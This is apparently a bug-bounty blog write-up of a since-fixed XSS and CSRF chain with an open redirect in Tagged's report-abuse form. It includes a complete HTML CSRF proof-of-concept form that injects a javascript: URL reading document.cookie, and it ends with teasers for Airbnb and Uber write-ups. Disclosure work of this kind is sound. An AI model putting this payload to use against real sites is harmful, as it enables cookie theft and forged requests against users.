XSS+CSRF attack in Tagged using Redirect parameter(Open URL Redirection attack Possible)

Hi guys,

Today i want to show you how you can combine XSS and CSRF attack.This is very interesting but pretty difficult to find and create a POC.

Bug type : XSS+CSRF
Bug category : XSS,CSRF
OWASP link :
1.https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
2.https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Description : In tagged you can report spam/abuse on any user.In HTTP POST request you will find a hidden parameter called "Referer" .This URL is used to redirect to you the URL you provide.You can also attack victim to Redirection attack to any website.
Now in Javascript when you give referrer as any URL,It will redirect you to given URL by you.But when you put javascript:alert(1) as a URL it will execute the code which you provide.
Attack Steps :
1. Create a CSRF POC where you will give XSS payload javascript:alert(1)
2.Click on the Button and you will get XSS pop up
3.You can also redirect victim to any malicious URL by putting URL in referrer.

XSS parameter used : javascript:alert(document.cookie) in referrer

Proxy Tool used : BurpSuite

HTML Code for CSRF:

<html>
<body>
<form  action="http://m.tagged.com/report_abuse.html "method="POST">
<input type ="hidden" name="report_userId" value="6025854846">
<input type="hidden" name="referer" value="javascript:alert(document.cookie)">
<input type="hidden" name ="contentId" value="1436985861035340" >
  <input type="hidden" name ="reason" value="threads" >
  <input type="submit">
</form>
</body>
</html>


Video POC :


Status : Fixed


Comments

Post a comment

Popular posts from this blog

Airbnb : Steal Earning of Airbnb hosts by Adding Bank Account/Payment Method (IDOR)

Image
Hi All,

Company Info :
Airbnb is an online marketplace and hospitality service, enabling people to lease or rent short-term lodging including vacation rentals, apartment rentals, homestays, hostel beds, or hotel rooms. The company does not own any lodging; it is merely a broker and receives percentage service fees (commissions) from both guests and hosts in conjunction with every booking. It has over 3,000,000 lodging listings in 65,000 cities and 191 countries,and the cost of lodging is set by the host.


Bug category :
Indirect Object Reference(IDOR)
Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References


Technical Details of the Bug : 
Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is Authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows…
Read more

Add Credit Card to Any Uber account Through eats.uber.com(CSRF)

Hi All ,

Company Info :
Uber Technologies Inc. is an American technology company headquartered in San Francisco, California, United States, operating in 633 cities worldwide. It develops, markets and operates the Uber car transportation and food delivery mobile apps. Uber drivers use their own cars, although drivers can rent a car to drive with Uber.

Bug Category and reference links :
Cross Site request forgery(CSRF)
link :https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Technical Details of the Bug :
CSRF takes advantage the fact that most web apps allow attackers to predict all the details of a particular action. Because browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones. Detection of CSRF flaws is fairly easy via penetration testing or code analysis.


Bug Description : 
It was Last September 2016 when eats.uber.com came in sco…
Read more